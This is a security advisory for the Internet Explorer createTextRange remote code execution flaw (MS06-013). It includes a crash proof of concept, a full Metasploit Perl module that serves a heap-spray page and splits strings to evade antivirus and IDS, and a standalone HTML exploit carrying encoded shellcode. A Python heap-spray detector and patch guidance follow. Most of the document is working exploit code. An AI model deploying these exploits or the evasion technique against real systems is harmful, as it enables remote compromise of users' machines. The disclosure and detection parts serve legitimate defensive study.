Microsoft Internet Explorer CreateTextRange Remote Code Execution Vulnerability (MS06-013)

Published: 2006-03-22
Updated: 2006-04-11

Affected systems:
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 5.0 SP4
Microsoft Internet Explorer 6.0
    - Microsoft Windows XP SP2
    - Microsoft Windows Server 2003 SP1
    - Microsoft Windows Server 2003
Description:
BUGTRAQ ID: 17196
CVE(CAN) ID: CVE-2006-1359

Microsoft Internet Explorer is a very popular web browser published by Microsoft.

The implementation of Internet Explorer's createTextRange() function contains a vulnerability that a remote attacker could exploit to execute arbitrary instructions on the client machine.

When Internet Explorer calls createTextRange() under certain conditions, an unintended list pointer dereference can occur, so that an error is raised when it attempts to call through the referenced 32-bit address, as shown below:

0x7D53C15D MOV ECX, DWORD PTR DS:[EDI]
..
0x7D53C166 CALL DWORD PTR [ECX]

Because of this dereference, ECX points to a distant, non-existent memory location; IE crashes, and arbitrary instructions may be executed.

<*Source: Stelian Ene (stelian.ene@gecadtech.com
          Joshua Heyer
          Andreas Sandblad (sandblad@acc.umu.se

  Links:  http://www.computerterrorism.com/research/ct22-03-2006
          http://secunia.com/advisories/18680/print/
          http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx?pf=true
          http://www.us-cert.gov/cas/techalerts/TA06-101A.html
*>

Test method:

Warning

The following programs (methods) may be offensive in nature and are provided for security research and teaching purposes only. Use at your own risk!

<input type="checkbox" id='c'>
<script>
    r=document.getElementById("c");
    a=r.createTextRange();
</script>

Exploit 1

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::ie_checkbox;

use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use POSIX;

my $advanced =
  {
  };

my $info =
  {
    'Name'           => 'Internet Explorer checkbox',
    'Version'        => '$Revision: 1.0 $',
    'Authors'        =>
      [
                '<justfriends4n0w [at] yahoo.com>'
      ],

    'Description'    =>
      Pex::Text::Freeform(qq{
            This module exploits a vulnerability in Internet Explorer's createTextRange() on a checkbox.
}),

    'Arch'           => [ 'x86' ],
    'OS'             => [ 'win32', 'winxp', 'win2003' ],
    'Priv'           => 0,

    'UserOpts'       =>
      {
        'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
        'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
      },

    'Payload'        =>
      {
        'Space'    => 1000,
        'MaxNops'  => 0,
        'Keys'     => [ '-ws2ord', '-bind' ],
#        'Keys'     => [ '-ws2ord' ],
      },

    'Refs'           =>
      [
        [ 'CVE', '' ],

      ],

    'DefaultTarget'  => 0,
    'Targets'        =>
      [
        [ 'Automatic - Windows 2000, Windows XP' ]
      ],
    
    'Keys'           => [ 'ie', 'internal' ],

    'DisclosureDate' => '22 Mar 2006',
  };

sub new
{
    my $class = shift;
    my $self;

    $self = $class->SUPER::new(
        {
            'Info'     => $info,
            'Advanced' => $advanced,
        },
        @_);

    return $self;
}
sub JSUnescape #Taken from Mozilla_Compareto by Aviv Raff and H D Moore
{
    my $self = shift;
    my $data = shift;
    my $code = '';

    # Encode the shellcode via %u sequences for JS's unescape() function.
    # Each %uXXXX unit carries two bytes in little-endian order, so an
    # odd-length input drops its trailing byte.
    my $idx = 0;
    while ($idx < length($data) - 1) {
        my $c1 = ord(substr($data, $idx, 1));
        my $c2 = ord(substr($data, $idx+1, 1));
        $code .= sprintf('%%u%.2x%.2x', $c2, $c1);
        $idx += 2;
    }

    return $code;
}


sub Exploit
{
    my $self = shift;
    my $server = IO::Socket::INET->new(
        LocalHost => $self->GetVar('HTTPHOST'),
        LocalPort => $self->GetVar('HTTPPORT'),
        ReuseAddr => 1,
        Listen    => 1,
        Proto     => 'tcp');
    my $client;

    # Did the listener create fail?
    if (not defined($server))
    {
        $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
        return;
    }

    $self->PrintLine("[*] Waiting for connections to http://" . $self->GetVar('HTTPHOST') . ":" . $self->GetVar('HTTPPORT') . " ...");

    while (defined($client = $server->accept()))
    {
        $self->HandleHttpClient(fd => Msf::Socket::Tcp->new_from_socket($client));
    }

    return;
}

sub HandleHttpClient
{
    my $self = shift;
    my ($fd) = @{{@_}}{qw/fd/};
    
    #my $targetIdx = $self->GetVar('TARGET');
    #my $target    = $self->Targets->[$targetIdx];
    #my $ret       = $target->[1];
    
    my $shellcode = $self->GetVar('EncodedPayload')->Payload;
    $shellcode   = $self->JSUnescape($shellcode);

    my $content;
    my $rhost;
    my $rport;

    # Target table keyed by the OS name derived from the User-Agent header
    my $targets =
      {
        "Windows XP"   => [0 ],
      };
    my $target;
    my $os;
    # Read the HTTP command
    my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10);

    # Read in the HTTP headers
    while (my $line = $fd->RecvLine(10))
    {
        my ($var, $val) = split /: /, $line;

        # Break out if we reach the end of the headers
        last if (not defined($var) or not defined($val));

        if ($var eq 'User-Agent')
        {
            $self->PrintLine(" *****useragent:" . $val);

            $os = "Windows 2003" if (!$os and $val =~ /Windows NT 5.2/);
            $os = "Windows XP"   if (!$os and $val =~ /Windows NT 5.1/);
            $os = "Windows 2000" if (!$os and $val =~ /Windows NT 5.0/);
            $os = "Windows NT"   if (!$os and $val =~ /Windows NT/);
            $os = "Unknown"      if (!$os);
        }
    }

    # Set the remote host information
    ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);

    # Build the page: fill the heap with NOP-sled blocks followed by the
    # payload, then trigger createTextRange() on the checkbox
    $content = "<input type=\"checkbox\" id=\"blah\">\n <SCRIPT language=\"javascript\">\n" .
        "shellcode = unescape(\"$shellcode\");\n" .
        "bigblock = unescape(\"%u9090%u9090\");\n" .
        "slackspace = 20 + shellcode.length;\n" .
        "while (bigblock.length < slackspace)\n" .
        "bigblock += bigblock;\n" .
        "fillblock = bigblock.substring(0, slackspace);\n" .
        "block = bigblock.substring(0, bigblock.length-slackspace);\n" .
        "while(block.length + slackspace < 0x40000) " .
        "block = block + block + fillblock;\n" .
        "memory = new Array();\n" .
        "for ( i = 0; i < 2020; i++ ) " .
        "memory[i] = block + shellcode;\n";

    #Break up the string to avoid Antivirus/IDS
    $content = $content .
        " s= \"document.getEle\";\n" .
        "s=s + \"mentById\"; \n" .
        "s=s + \"(\'blah\')\"; \n " .
        "s=s + \".create\";\n" .
        "s=s + \"TextRange();\";\n" .
        "eval(s);\n" .
        "</script>";


    $self->PrintLine("[*] HTTP Client connected from $rhost:$rport using $os, sending payload...");

    # Transmit the HTTP response
    $fd->Send(
        "HTTP/1.1 200 OK\r\n" .
          "Content-Type: text/html\r\n" .
          "Content-Length: " . length($content) . "\r\n" .
          "Connection: close\r\n" .
          "\r\n" .
          "$content"
      );

    $fd->Close();
}

1;

Exploit 2

<!--
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
/\
\/    Internet Explorer Remote Code Execution Exploit v 0.1
/\          by Darkeagle of Unl0ck Research Team
\/
/\    used SkyLined idea of exploitation. special tnx goes to him.
\/

Affected Software : Microsoft Internet Explorer 6.x, IE7 Beta 2
Severity          : Critical
Impact            : Remote System Access
Solution Status   : ** UNPATCHED **
Discovered by     : Computer Terrorism (UK)
Advisory Date     : 22nd March, 2006
Tested            : WinXP SP2 RUS IE 6.0 (full patched)

Vulnerability details:

PoC from CyberTerrorists crashes IE and overwrites EIP. EIP points to unknown place.
In my case it points to 0x3c0474c2.
Exploit fills heap with "nops+shellcode" 'til 0x3CxxXXxx. Then IE tries to read memory
@ 0x3c0474c2. At this time 0x3c0474c2 contains nops+shellcode. In the end IE executes
shellcode.

Exploit needs more RAM.
Tested under 192mb RAM with 800mb of maximum page cache.

Under 512mb code was executed after 1-1.5 minutes.

Successful exploitation will execute the standard Windows calculator.

Greets:
        Unl0ck Researchers,
        0x557 guys,
        ph4nt0m guys,
        sh0k, uf0,
        BlackSecurity guys,
        many otherz.

/\    http://unl0ck.net
\/    
/\    (c) 2004 - 2006
\/
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
-->
<pre>
<input type="checkbox" id="blah">
<SCRIPT language="javascript">

shellcode = unescape(    "%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
            "%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
            "%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
            "%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
            "%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
            "%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
            "%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
            "%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
            "%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
            "%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
            "%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
            "%uCC4A%uD0FF");

    bigblock = unescape("%u9090%u9090");
    slackspace = 20 + shellcode.length;

    while (bigblock.length < slackspace)
        bigblock += bigblock;

    fillblock = bigblock.substring(0, slackspace);

    block = bigblock.substring(0, bigblock.length-slackspace);

    while(block.length + slackspace < 0x40000)
        block = block + block + fillblock;

    memory = new Array();

    for ( i = 0; i < 2020; i++ )
        memory[i] = block + shellcode;

    var r = document.getElementById('blah').createTextRange();

</script>
</pre>
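Both exploits above serve the same heap-spray prologue (an unescape()'d 0x9090 NOP sled, a large array-filling loop, then the createTextRange() trigger), and Exploit 1 additionally splits "document.getElementById(...).createTextRange()" into string fragments joined at run time to evade signature matching. As an added example that is not part of the advisory or of either exploit, the following Python scanner rebuilds such split strings and flags a page only when the sled, the spray loop and the trigger all appear together; the sample HTML is constructed here with a placeholder in place of any payload.

```python
import re

# Constructed sample (not from the advisory): the spray prologue shared by
# both exploits, with the payload replaced by a harmless placeholder, plus
# the split-string trick Exploit 1 uses to hide createTextRange.
SAMPLE_HTML = """<input type="checkbox" id="blah">
<script>
shellcode = unescape("%uCCCC%uCCCC");
bigblock = unescape("%u9090%u9090");
while (bigblock.length < slackspace) bigblock += bigblock;
for ( i = 0; i < 2020; i++ ) memory[i] = block + shellcode;
s = "document.getEle";
s = s + "mentById";
s = s + "('blah')";
s = s + ".create";
s = s + "TextRange();";
eval(s);
</script>"""

STR_LIT = r'"((?:[^"\\]|\\.)*)"'
ASSIGN_RE = re.compile(r'(\w+)\s*=\s*' + STR_LIT + r'\s*;')
APPEND_RE = re.compile(r'(\w+)\s*=\s*\1\s*\+\s*' + STR_LIT + r'\s*;')

def join_split_strings(js: str) -> str:
    """Append the full value of every string built as s = "a"; s = s + "b";
    so that signatures see the concatenated text, not the fragments."""
    vals = {}
    for m in ASSIGN_RE.finditer(js):
        vals[m.group(1)] = m.group(2)
    for m in APPEND_RE.finditer(js):
        if m.group(1) in vals:
            vals[m.group(1)] += m.group(2)
    return js + "\n" + "\n".join(vals.values())

def heap_spray_indicators(html: str) -> dict:
    js = join_split_strings(html)
    return {
        # unescape() of a repeated 0x9090 NOP sled
        "nop_sled": bool(re.search(r'unescape\(\s*"(?:%u9090){2,}', js)),
        # a loop with a large bound storing blocks into an array
        "spray_loop": bool(re.search(
            r'for\s*\([^)]*<\s*\d{3,}[^)]*\)\s*\w+\[\w+\]\s*=', js)),
        "create_text_range": "createTextRange" in js,
        "eval_of_built_string": bool(re.search(r'eval\(\s*\w+\s*\)', js)),
    }

def is_suspicious(html: str) -> bool:
    ind = heap_spray_indicators(html)
    trigger = ind["create_text_range"] or ind["eval_of_built_string"]
    return ind["nop_sled"] and ind["spray_loop"] and trigger
```

A legitimate page that merely calls createTextRange() without the sled and spray loop is not flagged, which keeps the rule usable on proxy or IDS traffic.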

Recommendations:
Temporary workaround:

* Disable Active Scripting for untrusted users.

Vendor patch:

Microsoft
---------
Microsoft has released security bulletin MS06-013 and a corresponding patch for this issue:
MS06-013: Cumulative Security Update for Internet Explorer (912812)
Link: http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx?pf=true

This advisory was translated and compiled by 绿盟科技 (NSFOCUS); all rights reserved, no reproduction without permission.